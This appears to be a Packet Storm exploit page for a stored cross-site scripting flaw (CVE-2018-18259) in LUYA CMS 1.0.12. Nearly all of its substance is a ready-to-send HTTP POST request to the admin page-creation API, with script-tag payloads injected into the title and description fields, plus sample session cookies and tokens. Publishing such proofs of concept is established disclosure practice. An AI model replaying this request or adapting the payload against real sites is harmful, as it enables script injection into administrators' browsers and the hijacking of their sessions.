Twenty Year Anniversary

LUYA CMS 1.0.12 Cross Site Scripting

LUYA CMS 1.0.12 Cross Site Scripting
Posted Oct 12, 2018
Authored by Ismail Tasdelen

LUYA CMS version 1.0.12 suffers from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | e148edd591728b4ea0f6246c077f8c1f

LUYA CMS 1.0.12 Cross Site Scripting

Change Mirror Download
# Exploit Title: LUYA CMS 1.0.12 - Cross-Site Scripting
# Date: 2018-10-11
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://luya.io/
# Software Link : https://github.com/luyadev/luya/
# Software : LUYA CMS
# Version : 1.0.12
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : CVE-2018-18259


# HTTP POST Request :

POST /admin/api-cms-nav/create-page HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://TARGET/en/admin
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Authorization: Bearer 53431c6c5c751d6655966396667a70cbf483bc2869ce1b45cecb5be8983d6fa08o5E7gSdThq_KprALbv_-r496se-lhLi
X-CSRF-Token: vHqCboMdLTmKiufTdIrCcdmFAhmahRSLihW4CuJKQprpGNID4nZPd8njkYkO7Igpi-RFKfDgf8LTcOp4mhB34A==
Content-Length: 295
Cookie: _pk_id.1.2c3a=0f1464d36bad1760.1539204750.1.1539204750.1539204750.; _pk_ref.1.2c3a=%5B%22%22%2C%22%22%2C1539204750%2C%22https%3A%2F%2Fwww.google.com%2F%22%5D; PHPSESSID=pm9625erik3t3ddkqmql8nb0u1; _csrf_admin=b5e1f46c449881bd2d16dd32fcd2d2e02579c1a19bc7e233396e4bac99665c23a%3A2%3A%7Bi%3A0%3Bs%3A11%3A%22_csrf_admin%22%3Bi%3A1%3Bs%3A32%3A%22DxmjAB6ItiORW07BdnHjOXGhutdrmcx_%22%3B%7D
Connection: close

isInline=false&nav_item_type=1&parent_nav_id=0&is_draft=0&nav_container_id=1&lang_id=1&use_draft=0&layout_id=2&from_draft_id=0&title=%22%3E%3Cscript%3Ealert(%22Ismail%20Tasdelen%22)%3C%2Fscript%3E&alias=url-address-test&description=%22%3E%3Cscript%3Ealert(%22Ismail%20Tasdelen%22)%3C%2Fscript%3E

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    26 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    2 Files
  • 7
    Oct 7th
    3 Files
  • 8
    Oct 8th
    23 Files
  • 9
    Oct 9th
    16 Files
  • 10
    Oct 10th
    15 Files
  • 11
    Oct 11th
    19 Files
  • 12
    Oct 12th
    16 Files
  • 13
    Oct 13th
    2 Files
  • 14
    Oct 14th
    2 Files
  • 15
    Oct 15th
    15 Files
  • 16
    Oct 16th
    20 Files
  • 17
    Oct 17th
    19 Files
  • 18
    Oct 18th
    21 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close